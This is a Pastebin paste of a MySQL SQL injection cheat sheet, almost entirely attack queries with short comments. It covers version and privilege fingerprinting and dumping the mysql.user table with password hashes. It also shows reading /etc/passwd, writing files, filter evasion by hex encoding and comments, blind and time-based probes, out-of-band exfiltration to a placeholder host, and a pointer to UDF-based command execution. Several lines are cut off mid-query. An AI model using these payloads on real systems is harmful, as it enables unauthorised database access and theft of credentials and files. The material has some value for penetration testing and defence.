Googleinurl

[INFO]=> QUERYS SQL ~ INJECTION

Jul 16th, 2014
1,085
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Version:
  2. SELECT VERSION()
  3. SELECT @@version
  4. SELECT @@version_comment
  5. SELECT @@version_compile_machine
  6. SELECT @@version_compile_os
  7. Directories:
  8.  SELECT @@basedir
  9.  SELECT @@tmpdir
  10.  SELECT @@datadir
  11. Users:
  12.  SELECT USER()
  13.  SELECT SYSTEM_USER()
  14.  SELECT SESSION_USER()
  15.  SELECT CURRENT_USER()
  16. Current Database:
  17.  SELECT DATABASE()
  18. Concatenation:
  19.  SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
  20.  SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
  21. Multi-Concat:
  22. #Stacks the row "foo" from the table "bar" together, using the separa
  23.  #Note: This operation can by default only grab 1024 bytes, and do no
  24.  #The 1024 byte limit is stored in the @@group_concat_max_len variabl
  25. SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar
  26. Better-Concat:
  27. #CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
  28.  #Which therefor allows you to concat strings together up to the @@ma
  29.  #instead of @@group_concat_max_len. The default value for @@max_allo
  30.  #1048576 bytes, instead of @@group_concat_max_len's 1024.
  31. SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
  32. Change Collation:
  33. SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
  34.  SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
  35. Wildcards in SELECT(s):
  36.  SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
  37.  SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en
  38. Regular Expression in SELECT(s):
  39. #Returns all columns matching the regular expression.
  40. SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
  41. SELECT Without Dublicates:
  42. SELECT DISTINCT foo FROM bar
  43. Counting Columns:
  44.  SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t
  45. Get Amount of MySQL Users:
  46.  SELECT COUNT(user) FROM mysql.user
  47. Get MySQL Users:
  48.  SELECT user FROM mysql.user
  49. Get MySQL User Privileges:
  50.  SELECT grantee,privilege_type,is_grantable FROM information_schema.us
  51. Get MySQL User Privileges on Different Databases:
  52.  SELECT grantee,table_schema,privilege_type FROM information_schema.sc
  53.  Get MySQL User Privileges on Different Columns:
  54.  SELECT table_schema,table_name,column_name,privilege_type FROM infor
  55. Get MySQL User Credentials & Privileges:
  56.  SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
  57.  Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
  58.  File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
  59.  Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
  60.  Repl_client_priv) FROM mysql.user
  61. Get MySQL DBA Accounts:
  62.  SELECT grantee,privilege_type,is_grantable FROM information_schema.us
  63.  SELECT host,user FROM mysql.user WHERE Super_priv='Y'
  64. Get Databases:
  65.  SELECT schema_name FROM information_schema.schemata
  66.  SELECT DISTINCT db FROM mysql.db
  67.  SELECT DISTINCT table_schema FROM information_schema.columns
  68.  SELECT DISTINCT table_schema FROM information_schema.tables
  69. Get Databases & Tables:
  70.  SELECT table_schema,table_name FROM information_schema.tables
  71.  SELECT DISTINCT table_schema,table_name FROM information_schema.colu
  72. Get Databases, Tables & Columns:
  73.  SELECT table_schema,table_name,column_name FROM information_schema.c
  74. SELECT A Certain Row:
  75. SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
  76.  SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
  77.  ...
  78.  SELECT foo FROM bar LIMIT N,1; #Returns row N.
  79. Benchmark (Heavy Query):
  80. #Performs an MD5 calculation of "1" for 10000 times.
  81. SELECT BENCHMARK(10000,MD5(1))
  82. Sleep:
  83. #Works only in MySQL 5 and above.
  84.  #Sleeps for 5 seconds, returns 0 on success.
  85. SELECT SLEEP(5)
  86. Conversion (Casting):
  87. SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
  88.  SELECT CAST('65' AS CHAR); #Returns: A
  89. Substring:
  90. SELECT SUBSTR('foobar',1,3); #Returns: foo
  91. Hexadecimal Evasion:
  92. SELECT 0x41424344; #Returns: ABCD
  93.  SELECT 0x2E; #Returns: .
  94.  SELECT 0x3A; #Returns: :
  95. ASCII to Number:
  96. SELECT ASCII('A'); #Returns: 65
  97.  Number to ASCII:
  98. SELECT CHAR(65); #Returns: A
  99.  SELECT CHAR(89); #Returns: Y
  100.  SELECT CHAR(116,101,115,116); #Returns: test
  101. If Statement:
  102. #Returns 1 if the database is running MySQL 5.
  103. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
  104. #Returns 1 if the database is running MySQL 4.
  105. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
  106. Case Statement:
  107. #Returns 1 if the database is running MySQL 5.
  108. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
  109. #Returns 1 if the database is running MySQL 4.
  110. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
  111. Read File(s):
  112. #Requires you to have the File_priv in mysql.user. On error this stat
  113. SELECT LOAD_FILE('/etc/passwd')
  114. Write File(s):
  115. #You must use quotes on the filename!
  116. SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
  117.  SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
  118. Logical Operator(s):
  119. AND, &&; #The AND operator have && as an alternative syntax.
  120. OR, ||;  #The OR operator have || as an alternative syntax.
  121. NOT, !; #The NOT operator have ! as an alternative syntax.
  122. XOR; #The XOR operator got no alternative syntax.
  123. Fuzzy Code Comment:
  124. #Code within /*! are getting executed by MySQL. Additional /*! can be
  125. SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
  126. Comments:
  127. SELECT foo, bar FROM foo.bar-- Single line comment
  128. SELECT foo, bar FROM foo.bar/* Multi line comment */
  129. SELECT foo, bar FROM foo.bar# Single line comment
  130. SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
  131. A few evasions/methods to use between your MySQL statements:
  132. CR (%0D); #Carrier Return.
  133. LF (%0A); #Line Feed.
  134. Tab (%09); #The Tab-key.
  135. Space (%20); #Most commonly used. You know what a space is.
  136. Multiline Comment (/**/); #Well, as the name says.
  137. Fuzzy Comment (/*!); #Be sure to end your query with (*/)
  138. Parenthesis, ( and ); #Can also be used as separators when used right
  139. Parenthesis instead of space:
  140. #As said two lines above, the use of parenthesis can be used as a sep
  141. SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
  142. Auto-Casting to Right Collation:
  143. SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
  144. DNS Requests (OOB (Out-Of-Band)):
  145. #For more information check this.
  146. SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_a
  147. Command Execution:
  148. #If you're on a MySQL 4.X server, it's possible to execute OS comman
  149. #It can be done if you're able to upload a shared object into /usr/
  150.  #The file extension is .so, and it must contain an "User Defined Fun
  151.  #Get raptor_udf.c, it's the source-code for just that feature.
  152.  #Remember to compile it for the right CPU Architecture.
  153.  #The CPU architecture can be resolved by this query:
  154. SELECT @@version_machine;
  155.  <blockquote>A couple of useful blind queries to fingerprint the data
  156. All of these return either True or False, as in, you either get a res
  157. SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
  158.  SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
  159. Running as root:
  160. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
  161. Got File_priv:
  162. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
  163.  (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
  164.  (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
  165.  (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
  166.  LIMIT 0,1)=CHAR(89),1,0)=1
  167. Got Super_priv (Are we DBA):
  168. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
  169.  (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
  170.  (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
  171.  (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
  172.  LIMIT 0,1)=CHAR(89),1,0)=1
  173. Can MySQL Sleep:
  174. #This query will return True and should take above 1 second to execut
  175. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
  176. Can MySQL Benchmark:
  177. SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
  178. Are we on *NIX:
  179. SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
  180. Are we on Windows:
  181. SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
  182. Do a certain column exist:
  183. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
  184.  Do a certain table exist:
  185. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
  186. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
  187. Do a certain database exist:
  188. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
  189. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
  190. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
  191. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db
  192. from:h.ackack(dot)net
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×